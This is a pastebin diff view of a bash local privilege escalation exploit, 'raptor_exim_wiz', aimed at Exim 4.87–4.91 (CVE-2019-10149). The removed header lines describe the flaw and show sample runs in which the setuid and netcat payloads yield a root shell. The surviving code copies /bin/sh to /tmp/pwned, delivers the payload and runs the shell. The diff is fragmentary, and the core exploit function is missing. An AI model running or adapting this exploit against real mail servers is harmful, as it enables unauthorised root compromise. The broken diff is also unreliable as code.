SHOW:
|
|
- or go back to the newest paste.
1 | #!/bin/bash | |
2 | METHOD="setuid" # default method | |
3 | - | # |
3 | + | |
4 | - | # raptor_exim_wiz - "The Return of the WIZard" LPE exploit |
4 | + | |
5 | - | # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> |
5 | + | |
6 | - | # |
6 | + | |
7 | - | # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). |
7 | + | |
8 | - | # Improper validation of recipient address in deliver_message() |
8 | + | |
9 | - | # function in /src/deliver.c may lead to remote command execution. |
9 | + | |
10 | - | # (CVE-2019-10149) |
10 | + | |
11 | - | # |
11 | + | |
12 | - | # This is a local privilege escalation exploit for "The Return |
12 | + | |
13 | - | # of the WIZard" vulnerability reported by the Qualys Security |
13 | + | |
14 | - | # Advisory team. |
14 | + | |
15 | - | # |
15 | + | |
16 | - | # Credits: |
16 | + | |
17 | - | # Qualys Security Advisory team (kudos for your amazing research!) |
17 | + | |
18 | - | # Dennis 'dhn' Herrmann (/dev/tcp technique) |
18 | + | |
19 | - | # |
19 | + | |
20 | - | # Usage (setuid method): |
20 | + | |
21 | - | # $ id |
21 | + | |
22 | - | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] |
22 | + | |
23 | - | # $ ./raptor_exim_wiz -m setuid |
23 | + | |
24 | - | # Preparing setuid shell helper... |
24 | + | |
25 | - | # Delivering setuid payload... |
25 | + | |
26 | - | # [...] |
26 | + | |
27 | - | # Waiting 5 seconds... |
27 | + | |
28 | - | # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned |
28 | + | |
29 | - | # # id |
29 | + | |
30 | - | # uid=0(root) gid=0(root) groups=0(root) |
30 | + | |
31 | - | # |
31 | + | |
32 | - | # Usage (netcat method): |
32 | + | |
33 | - | # $ id |
33 | + | |
34 | - | # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] |
34 | + | |
35 | - | # $ ./raptor_exim_wiz -m netcat |
35 | + | |
36 | - | # Delivering netcat payload... |
36 | + | |
37 | - | # Waiting 5 seconds... |
37 | + | |
38 | - | # localhost [127.0.0.1] 31337 (?) open |
38 | + | |
39 | - | # id |
39 | + | |
40 | - | # uid=0(root) gid=0(root) groups=0(root) |
40 | + | |
41 | - | # |
41 | + | |
42 | - | # Vulnerable platforms: |
42 | + | |
43 | - | # Exim 4.87 - 4.91 |
43 | + | |
44 | - | # |
44 | + | |
45 | - | # Tested against: |
45 | + | |
46 | - | # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] |
46 | + | |
47 | - | # |
47 | + | |
48 | echo "Problems compiling setuid shell helper, check your gcc." | |
49 | echo "Falling back to the /bin/sh method." | |
50 | cp /bin/sh /tmp/pwned | |
51 | fi | |
52 | echo | |
53 | - | # usage instructions |
53 | + | |
54 | - | function usage() |
54 | + | |
55 | echo "Delivering $METHOD payload..." | |
56 | - | echo "$0 [-m METHOD]" |
56 | + | |
57 | exploit | |
58 | - | echo "-m setuid : use the setuid payload (default)" |
58 | + | |
59 | - | echo "-m netcat : use the netcat payload" |
59 | + | |
60 | # wait for the magic to happen and spawn our shell | |
61 | - | exit 1 |
61 | + | |
62 | sleep 5 | |
63 | ls -l /tmp/pwned | |
64 | /tmp/pwned |